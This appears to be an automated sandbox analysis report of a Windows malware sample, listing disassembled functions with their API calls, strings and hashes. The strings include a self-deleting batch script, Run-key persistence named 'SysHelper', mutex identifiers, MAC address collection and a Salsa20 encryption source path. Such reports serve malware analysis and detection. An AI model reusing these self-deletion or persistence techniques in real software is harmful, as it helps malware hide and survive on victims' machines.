__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 719f36a72e13949c5d2aa7e299c03c5bf335634207a9ba81f0c43b67b23a03fe
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 719f36a72e13949c5d2aa7e299c03c5bf335634207a9ba81f0c43b67b23a03fe
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
CreateCompatibleDC.GDI32(00000000), ref: 00482323
GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
SelectObject.GDI32(00000000,00000000), ref: 0048235C
GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
SelectObject.GDI32(?,?), ref: 00482436
DeleteObject.GDI32(00000000), ref: 0048243D
DeleteDC.GDI32(?), ref: 0048244A
DeleteDC.GDI32(?), ref: 00482450

Strings

DISPLAY, xrefs: 00482311
.\crypto\rand\rand_win.c, xrefs: 00482383

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: .\crypto\rand\rand_win.c$DISPLAY
API String ID: 151064509-1805842116
Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00660000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
Address: %s, mac: %s, xrefs: 0040E72D
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 7f15536ece751806a483f3f034c79f9e821e57de7f78c7461c513ac46dc48599
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: c304b8838ffad965ef1519d68e08274285a6e14b9f19c4db7e45e903d279ed5b
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: c304b8838ffad965ef1519d68e08274285a6e14b9f19c4db7e45e903d279ed5b
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON

Download Yara Rule

APIs

PathAppendW.SHLWAPI(?,?), ref: 0040FBD5
_memmove.LIBCMT ref: 0040FC3C
PathFileExistsW.SHLWAPI(?,?,?,?), ref: 0040FC63
_malloc.LIBCMT ref: 0040FC72
lstrcpyW.KERNEL32(00000000,?), ref: 0040FC8C
lstrcatW.KERNEL32(00000000,?), ref: 0040FCA5
_free.LIBCMT ref: 0040FCD7

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
String ID:
API String ID: 3232302685-0
Opcode ID: 567d7dae523e8cf071f60b6d9254d1c0a11b6878fb868ff70e0d62ab5362e99b
Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
Opcode Fuzzy Hash: 567d7dae523e8cf071f60b6d9254d1c0a11b6878fb868ff70e0d62ab5362e99b
Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

ACP, xrefs: 004382B3
OCP, xrefs: 004382C4

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON

Download Yara Rule

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
input != nullptr && output != nullptr, xrefs: 0040C095

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 00411190
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

delself.bat, xrefs: 0041261C
del ", xrefs: 00412674
TEMP, xrefs: 004125DF
D, xrefs: 00412720
@echo off:trydel ", xrefs: 0041262A
" goto try, xrefs: 00412666
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
"if exist ", xrefs: 00412648

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00427B21 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00427B29
_free.LIBCMT ref: 00427B42

Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

_free.LIBCMT ref: 00427B55
_free.LIBCMT ref: 00427B73
_free.LIBCMT ref: 00427B85
_free.LIBCMT ref: 00427B96
_free.LIBCMT ref: 00427BA1
_free.LIBCMT ref: 00427BC5
EncodePointer.KERNEL32(00664D40), ref: 00427BCC
_free.LIBCMT ref: 00427BE1
_free.LIBCMT ref: 00427BF7
_free.LIBCMT ref: 00427C1F

Strings

@Mf, xrefs: 00427B5A, 00427B7E, 00427B90

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID: @Mf
API String ID: 3064303923-1860018679
Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

-----, xrefs: 004636D4, 00463A21
, xrefs: 00463A90
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----END , xrefs: 0046382F, 00463940, 004639E4
-----BEGIN , xrefs: 004636A4

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: e1f77275b894a36aef18560a381d330bc3755f08ff7058d738956a3ca95a28b6
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: e1f77275b894a36aef18560a381d330bc3755f08ff7058d738956a3ca95a28b6
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: 5075abd3b7781529bf4608b3d91f823d00f671c0f59faa4ecf70233b2191990b
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: 5075abd3b7781529bf4608b3d91f823d00f671c0f59faa4ecf70233b2191990b
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

_OPENSSL_isservice, xrefs: 004549D1
Service-0x, xrefs: 00454A80

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
